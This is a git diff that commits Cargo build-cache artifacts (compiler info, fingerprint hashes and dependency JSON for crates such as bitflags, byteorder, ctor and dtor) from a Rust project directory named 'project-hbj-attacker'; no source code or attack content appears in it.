+{"rustc_fingerprint":11864223873831121762,"outputs":{"7971740275564407648":{"success":true,"status":"","code":0,"stdout":"___\nlib___.rlib\nlib___.so\nlib___.so\nlib___.a\nlib___.so\n/home/acite/.rustup/toolchains/stable-x86_64-unknown-linux-gnu\noff\npacked\nunpacked\n___\ndebug_assertions\npanic=\"unwind\"\nproc_macro\ntarget_abi=\"\"\ntarget_arch=\"x86_64\"\ntarget_endian=\"little\"\ntarget_env=\"gnu\"\ntarget_family=\"unix\"\ntarget_feature=\"fxsr\"\ntarget_feature=\"sse\"\ntarget_feature=\"sse2\"\ntarget_has_atomic=\"16\"\ntarget_has_atomic=\"32\"\ntarget_has_atomic=\"64\"\ntarget_has_atomic=\"8\"\ntarget_has_atomic=\"ptr\"\ntarget_os=\"linux\"\ntarget_pointer_width=\"64\"\ntarget_vendor=\"unknown\"\nunix\n","stderr":""},"17747080675513052775":{"success":true,"status":"","code":0,"stdout":"rustc 1.90.0 (1159e78c4 2025-09-14)\nbinary: rustc\ncommit-hash: 1159e78c4747b02ef996e55082b704c09b970588\ncommit-date: 2025-09-14\nhost: x86_64-unknown-linux-gnu\nrelease: 1.90.0\nLLVM version: 20.1.8\n","stderr":""}},"successes":{}}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/CACHEDIR.TAG b/01/project-hbj-attacker/target/CACHEDIR.TAG
new file mode 100644
index 0000000..20d7c31
--- /dev/null
+++ b/01/project-hbj-attacker/target/CACHEDIR.TAG
@@ -0,0 +1,3 @@
+Signature: 8a477f597d28d172789f06886806bc55
+# This file is a cache directory tag created by cargo.
+# For information about cache directory tags see https://bford.info/cachedir/
diff --git a/01/project-hbj-attacker/target/debug/.cargo-lock b/01/project-hbj-attacker/target/debug/.cargo-lock
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/bitflags-6bd6ffbc38de7ac6/dep-lib-bitflags b/01/project-hbj-attacker/target/debug/.fingerprint/bitflags-6bd6ffbc38de7ac6/dep-lib-bitflags
new file mode 100644
index 0000000..ec3cb8b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/bitflags-6bd6ffbc38de7ac6/dep-lib-bitflags differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/bitflags-6bd6ffbc38de7ac6/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/bitflags-6bd6ffbc38de7ac6/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/bitflags-6bd6ffbc38de7ac6/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/bitflags-6bd6ffbc38de7ac6/lib-bitflags b/01/project-hbj-attacker/target/debug/.fingerprint/bitflags-6bd6ffbc38de7ac6/lib-bitflags
new file mode 100644
index 0000000..38ff4fe
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/bitflags-6bd6ffbc38de7ac6/lib-bitflags
@@ -0,0 +1 @@
+979dcd14d2bc51aa
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/bitflags-6bd6ffbc38de7ac6/lib-bitflags.json b/01/project-hbj-attacker/target/debug/.fingerprint/bitflags-6bd6ffbc38de7ac6/lib-bitflags.json
new file mode 100644
index 0000000..c98085b
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/bitflags-6bd6ffbc38de7ac6/lib-bitflags.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[\"arbitrary\", \"bytemuck\", \"example_generated\", \"serde\", \"serde_core\", \"std\"]","target":7691312148208718491,"profile":15657897354478470176,"path":16099685776734010893,"deps":[],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/bitflags-6bd6ffbc38de7ac6/dep-lib-bitflags","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/bitflags-b38c1791fbb94bbd/dep-lib-bitflags b/01/project-hbj-attacker/target/debug/.fingerprint/bitflags-b38c1791fbb94bbd/dep-lib-bitflags
new file mode 100644
index 0000000..ec3cb8b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/bitflags-b38c1791fbb94bbd/dep-lib-bitflags differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/bitflags-b38c1791fbb94bbd/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/bitflags-b38c1791fbb94bbd/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/bitflags-b38c1791fbb94bbd/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/bitflags-b38c1791fbb94bbd/lib-bitflags b/01/project-hbj-attacker/target/debug/.fingerprint/bitflags-b38c1791fbb94bbd/lib-bitflags
new file mode 100644
index 0000000..9583406
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/bitflags-b38c1791fbb94bbd/lib-bitflags
@@ -0,0 +1 @@
+49fe66b7380610fa
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/bitflags-b38c1791fbb94bbd/lib-bitflags.json b/01/project-hbj-attacker/target/debug/.fingerprint/bitflags-b38c1791fbb94bbd/lib-bitflags.json
new file mode 100644
index 0000000..aaffc0a
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/bitflags-b38c1791fbb94bbd/lib-bitflags.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[\"arbitrary\", \"bytemuck\", \"example_generated\", \"serde\", \"serde_core\", \"std\"]","target":7691312148208718491,"profile":2225463790103693989,"path":16099685776734010893,"deps":[],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/bitflags-b38c1791fbb94bbd/dep-lib-bitflags","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/bitflags-f4c5089826d514d1/dep-lib-bitflags b/01/project-hbj-attacker/target/debug/.fingerprint/bitflags-f4c5089826d514d1/dep-lib-bitflags
new file mode 100644
index 0000000..ec3cb8b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/bitflags-f4c5089826d514d1/dep-lib-bitflags differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/bitflags-f4c5089826d514d1/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/bitflags-f4c5089826d514d1/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/bitflags-f4c5089826d514d1/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/bitflags-f4c5089826d514d1/lib-bitflags b/01/project-hbj-attacker/target/debug/.fingerprint/bitflags-f4c5089826d514d1/lib-bitflags
new file mode 100644
index 0000000..9f5c224
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/bitflags-f4c5089826d514d1/lib-bitflags
@@ -0,0 +1 @@
+936d6d504e22b53a
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/bitflags-f4c5089826d514d1/lib-bitflags.json b/01/project-hbj-attacker/target/debug/.fingerprint/bitflags-f4c5089826d514d1/lib-bitflags.json
new file mode 100644
index 0000000..e29b535
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/bitflags-f4c5089826d514d1/lib-bitflags.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[\"arbitrary\", \"bytemuck\", \"example_generated\", \"serde\", \"serde_core\", \"std\"]","target":7691312148208718491,"profile":2241668132362809309,"path":16099685776734010893,"deps":[],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/bitflags-f4c5089826d514d1/dep-lib-bitflags","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/byteorder-488d2f8c43033f2b/dep-lib-byteorder b/01/project-hbj-attacker/target/debug/.fingerprint/byteorder-488d2f8c43033f2b/dep-lib-byteorder
new file mode 100644
index 0000000..ec3cb8b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/byteorder-488d2f8c43033f2b/dep-lib-byteorder differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/byteorder-488d2f8c43033f2b/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/byteorder-488d2f8c43033f2b/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/byteorder-488d2f8c43033f2b/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/byteorder-488d2f8c43033f2b/lib-byteorder b/01/project-hbj-attacker/target/debug/.fingerprint/byteorder-488d2f8c43033f2b/lib-byteorder
new file mode 100644
index 0000000..0eaa121
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/byteorder-488d2f8c43033f2b/lib-byteorder
@@ -0,0 +1 @@
+6c817590d5c77ad8
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/byteorder-488d2f8c43033f2b/lib-byteorder.json b/01/project-hbj-attacker/target/debug/.fingerprint/byteorder-488d2f8c43033f2b/lib-byteorder.json
new file mode 100644
index 0000000..912e2e2
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/byteorder-488d2f8c43033f2b/lib-byteorder.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[\"default\", \"std\"]","declared_features":"[\"default\", \"i128\", \"std\"]","target":8344828840634961491,"profile":15657897354478470176,"path":47261432787038350,"deps":[],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/byteorder-488d2f8c43033f2b/dep-lib-byteorder","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/byteorder-660949308c728b98/dep-lib-byteorder b/01/project-hbj-attacker/target/debug/.fingerprint/byteorder-660949308c728b98/dep-lib-byteorder
new file mode 100644
index 0000000..ec3cb8b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/byteorder-660949308c728b98/dep-lib-byteorder differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/byteorder-660949308c728b98/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/byteorder-660949308c728b98/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/byteorder-660949308c728b98/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/byteorder-660949308c728b98/lib-byteorder b/01/project-hbj-attacker/target/debug/.fingerprint/byteorder-660949308c728b98/lib-byteorder
new file mode 100644
index 0000000..9ff32d2
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/byteorder-660949308c728b98/lib-byteorder
@@ -0,0 +1 @@
+610d001fec19ee77
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/byteorder-660949308c728b98/lib-byteorder.json b/01/project-hbj-attacker/target/debug/.fingerprint/byteorder-660949308c728b98/lib-byteorder.json
new file mode 100644
index 0000000..343e762
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/byteorder-660949308c728b98/lib-byteorder.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[\"default\", \"std\"]","declared_features":"[\"default\", \"i128\", \"std\"]","target":8344828840634961491,"profile":2225463790103693989,"path":47261432787038350,"deps":[],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/byteorder-660949308c728b98/dep-lib-byteorder","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/byteorder-ec64c3234ca862a5/dep-lib-byteorder b/01/project-hbj-attacker/target/debug/.fingerprint/byteorder-ec64c3234ca862a5/dep-lib-byteorder
new file mode 100644
index 0000000..ec3cb8b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/byteorder-ec64c3234ca862a5/dep-lib-byteorder differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/byteorder-ec64c3234ca862a5/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/byteorder-ec64c3234ca862a5/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/byteorder-ec64c3234ca862a5/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/byteorder-ec64c3234ca862a5/lib-byteorder b/01/project-hbj-attacker/target/debug/.fingerprint/byteorder-ec64c3234ca862a5/lib-byteorder
new file mode 100644
index 0000000..d99ab4b
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/byteorder-ec64c3234ca862a5/lib-byteorder
@@ -0,0 +1 @@
+b0e45b10f8bfb17d
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/byteorder-ec64c3234ca862a5/lib-byteorder.json b/01/project-hbj-attacker/target/debug/.fingerprint/byteorder-ec64c3234ca862a5/lib-byteorder.json
new file mode 100644
index 0000000..8824a0c
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/byteorder-ec64c3234ca862a5/lib-byteorder.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[\"default\", \"std\"]","declared_features":"[\"default\", \"i128\", \"std\"]","target":8344828840634961491,"profile":2241668132362809309,"path":47261432787038350,"deps":[],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/byteorder-ec64c3234ca862a5/dep-lib-byteorder","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/cfg-if-0d06577c98329a83/dep-lib-cfg_if b/01/project-hbj-attacker/target/debug/.fingerprint/cfg-if-0d06577c98329a83/dep-lib-cfg_if
new file mode 100644
index 0000000..ec3cb8b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/cfg-if-0d06577c98329a83/dep-lib-cfg_if differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/cfg-if-0d06577c98329a83/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/cfg-if-0d06577c98329a83/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/cfg-if-0d06577c98329a83/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/cfg-if-0d06577c98329a83/lib-cfg_if b/01/project-hbj-attacker/target/debug/.fingerprint/cfg-if-0d06577c98329a83/lib-cfg_if
new file mode 100644
index 0000000..70b802c
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/cfg-if-0d06577c98329a83/lib-cfg_if
@@ -0,0 +1 @@
+cb505de9e6460bea
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/cfg-if-0d06577c98329a83/lib-cfg_if.json b/01/project-hbj-attacker/target/debug/.fingerprint/cfg-if-0d06577c98329a83/lib-cfg_if.json
new file mode 100644
index 0000000..e91f7df
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/cfg-if-0d06577c98329a83/lib-cfg_if.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[\"core\", \"rustc-dep-of-std\"]","target":13840298032947503755,"profile":2241668132362809309,"path":5877701015150254181,"deps":[],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/cfg-if-0d06577c98329a83/dep-lib-cfg_if","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/cfg-if-43f8c950438ad461/dep-lib-cfg_if b/01/project-hbj-attacker/target/debug/.fingerprint/cfg-if-43f8c950438ad461/dep-lib-cfg_if
new file mode 100644
index 0000000..ec3cb8b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/cfg-if-43f8c950438ad461/dep-lib-cfg_if differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/cfg-if-43f8c950438ad461/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/cfg-if-43f8c950438ad461/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/cfg-if-43f8c950438ad461/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/cfg-if-43f8c950438ad461/lib-cfg_if b/01/project-hbj-attacker/target/debug/.fingerprint/cfg-if-43f8c950438ad461/lib-cfg_if
new file mode 100644
index 0000000..9b490e4
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/cfg-if-43f8c950438ad461/lib-cfg_if
@@ -0,0 +1 @@
+338f6c48cef9260b
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/cfg-if-43f8c950438ad461/lib-cfg_if.json b/01/project-hbj-attacker/target/debug/.fingerprint/cfg-if-43f8c950438ad461/lib-cfg_if.json
new file mode 100644
index 0000000..0423ba8
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/cfg-if-43f8c950438ad461/lib-cfg_if.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[\"core\", \"rustc-dep-of-std\"]","target":13840298032947503755,"profile":15657897354478470176,"path":5877701015150254181,"deps":[],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/cfg-if-43f8c950438ad461/dep-lib-cfg_if","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/cfg_aliases-4c174da7cc486c29/dep-lib-cfg_aliases b/01/project-hbj-attacker/target/debug/.fingerprint/cfg_aliases-4c174da7cc486c29/dep-lib-cfg_aliases
new file mode 100644
index 0000000..ec3cb8b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/cfg_aliases-4c174da7cc486c29/dep-lib-cfg_aliases differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/cfg_aliases-4c174da7cc486c29/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/cfg_aliases-4c174da7cc486c29/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/cfg_aliases-4c174da7cc486c29/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/cfg_aliases-4c174da7cc486c29/lib-cfg_aliases b/01/project-hbj-attacker/target/debug/.fingerprint/cfg_aliases-4c174da7cc486c29/lib-cfg_aliases
new file mode 100644
index 0000000..8f47a9f
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/cfg_aliases-4c174da7cc486c29/lib-cfg_aliases
@@ -0,0 +1 @@
+8a6edfde7b5f27a5
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/cfg_aliases-4c174da7cc486c29/lib-cfg_aliases.json b/01/project-hbj-attacker/target/debug/.fingerprint/cfg_aliases-4c174da7cc486c29/lib-cfg_aliases.json
new file mode 100644
index 0000000..2c15ff0
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/cfg_aliases-4c174da7cc486c29/lib-cfg_aliases.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":14022534369768855544,"profile":4865940544660723616,"path":1501229088839890109,"deps":[],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/cfg_aliases-4c174da7cc486c29/dep-lib-cfg_aliases","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/ctor-764f90eab28ab065/dep-lib-ctor b/01/project-hbj-attacker/target/debug/.fingerprint/ctor-764f90eab28ab065/dep-lib-ctor
new file mode 100644
index 0000000..ec3cb8b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/ctor-764f90eab28ab065/dep-lib-ctor differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/ctor-764f90eab28ab065/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/ctor-764f90eab28ab065/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/ctor-764f90eab28ab065/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/ctor-764f90eab28ab065/lib-ctor b/01/project-hbj-attacker/target/debug/.fingerprint/ctor-764f90eab28ab065/lib-ctor
new file mode 100644
index 0000000..b370b47
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/ctor-764f90eab28ab065/lib-ctor
@@ -0,0 +1 @@
+f2f5e5789faf42b7
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/ctor-764f90eab28ab065/lib-ctor.json b/01/project-hbj-attacker/target/debug/.fingerprint/ctor-764f90eab28ab065/lib-ctor.json
new file mode 100644
index 0000000..2c71acf
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/ctor-764f90eab28ab065/lib-ctor.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[\"__no_warn_on_missing_unsafe\", \"default\", \"dtor\", \"proc_macro\"]","declared_features":"[\"__no_warn_on_missing_unsafe\", \"default\", \"dtor\", \"proc_macro\", \"used_linker\"]","target":12000066584039447229,"profile":15657897354478470176,"path":4803490687379766138,"deps":[[2800821796651017684,"dtor",false,1340909728606601811],[14566786680421874444,"ctor_proc_macro",false,1127171802473362288]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/ctor-764f90eab28ab065/dep-lib-ctor","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/ctor-c7993d1f929e2c48/dep-lib-ctor b/01/project-hbj-attacker/target/debug/.fingerprint/ctor-c7993d1f929e2c48/dep-lib-ctor
new file mode 100644
index 0000000..ec3cb8b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/ctor-c7993d1f929e2c48/dep-lib-ctor differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/ctor-c7993d1f929e2c48/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/ctor-c7993d1f929e2c48/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/ctor-c7993d1f929e2c48/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/ctor-c7993d1f929e2c48/lib-ctor b/01/project-hbj-attacker/target/debug/.fingerprint/ctor-c7993d1f929e2c48/lib-ctor
new file mode 100644
index 0000000..580b4f9
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/ctor-c7993d1f929e2c48/lib-ctor
@@ -0,0 +1 @@
+d39cd794b12da8da
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/ctor-c7993d1f929e2c48/lib-ctor.json b/01/project-hbj-attacker/target/debug/.fingerprint/ctor-c7993d1f929e2c48/lib-ctor.json
new file mode 100644
index 0000000..132bb49
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/ctor-c7993d1f929e2c48/lib-ctor.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[\"__no_warn_on_missing_unsafe\", \"default\", \"dtor\", \"proc_macro\"]","declared_features":"[\"__no_warn_on_missing_unsafe\", \"default\", \"dtor\", \"proc_macro\", \"used_linker\"]","target":12000066584039447229,"profile":2241668132362809309,"path":4803490687379766138,"deps":[[2800821796651017684,"dtor",false,18016150149204271332],[14566786680421874444,"ctor_proc_macro",false,1127171802473362288]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/ctor-c7993d1f929e2c48/dep-lib-ctor","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/ctor-proc-macro-6f45fcea41a18c46/dep-lib-ctor_proc_macro b/01/project-hbj-attacker/target/debug/.fingerprint/ctor-proc-macro-6f45fcea41a18c46/dep-lib-ctor_proc_macro
new file mode 100644
index 0000000..ec3cb8b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/ctor-proc-macro-6f45fcea41a18c46/dep-lib-ctor_proc_macro differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/ctor-proc-macro-6f45fcea41a18c46/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/ctor-proc-macro-6f45fcea41a18c46/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/ctor-proc-macro-6f45fcea41a18c46/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/ctor-proc-macro-6f45fcea41a18c46/lib-ctor_proc_macro b/01/project-hbj-attacker/target/debug/.fingerprint/ctor-proc-macro-6f45fcea41a18c46/lib-ctor_proc_macro
new file mode 100644
index 0000000..5ad89c1
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/ctor-proc-macro-6f45fcea41a18c46/lib-ctor_proc_macro
@@ -0,0 +1 @@
+70f34247c884a40f
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/ctor-proc-macro-6f45fcea41a18c46/lib-ctor_proc_macro.json b/01/project-hbj-attacker/target/debug/.fingerprint/ctor-proc-macro-6f45fcea41a18c46/lib-ctor_proc_macro.json
new file mode 100644
index 0000000..a9e95d8
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/ctor-proc-macro-6f45fcea41a18c46/lib-ctor_proc_macro.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[\"default\"]","declared_features":"[\"default\"]","target":9792173086656756395,"profile":2225463790103693989,"path":211077856188338067,"deps":[],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/ctor-proc-macro-6f45fcea41a18c46/dep-lib-ctor_proc_macro","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/dtor-868de25bd3f2f018/dep-lib-dtor b/01/project-hbj-attacker/target/debug/.fingerprint/dtor-868de25bd3f2f018/dep-lib-dtor
new file mode 100644
index 0000000..ec3cb8b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/dtor-868de25bd3f2f018/dep-lib-dtor differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/dtor-868de25bd3f2f018/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/dtor-868de25bd3f2f018/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/dtor-868de25bd3f2f018/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/dtor-868de25bd3f2f018/lib-dtor b/01/project-hbj-attacker/target/debug/.fingerprint/dtor-868de25bd3f2f018/lib-dtor
new file mode 100644
index 0000000..e584169
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/dtor-868de25bd3f2f018/lib-dtor
@@ -0,0 +1 @@
+534276314bde9b12
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/dtor-868de25bd3f2f018/lib-dtor.json b/01/project-hbj-attacker/target/debug/.fingerprint/dtor-868de25bd3f2f018/lib-dtor.json
new file mode 100644
index 0000000..7a31bc6
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/dtor-868de25bd3f2f018/lib-dtor.json
@@ -0,0 +1 @@
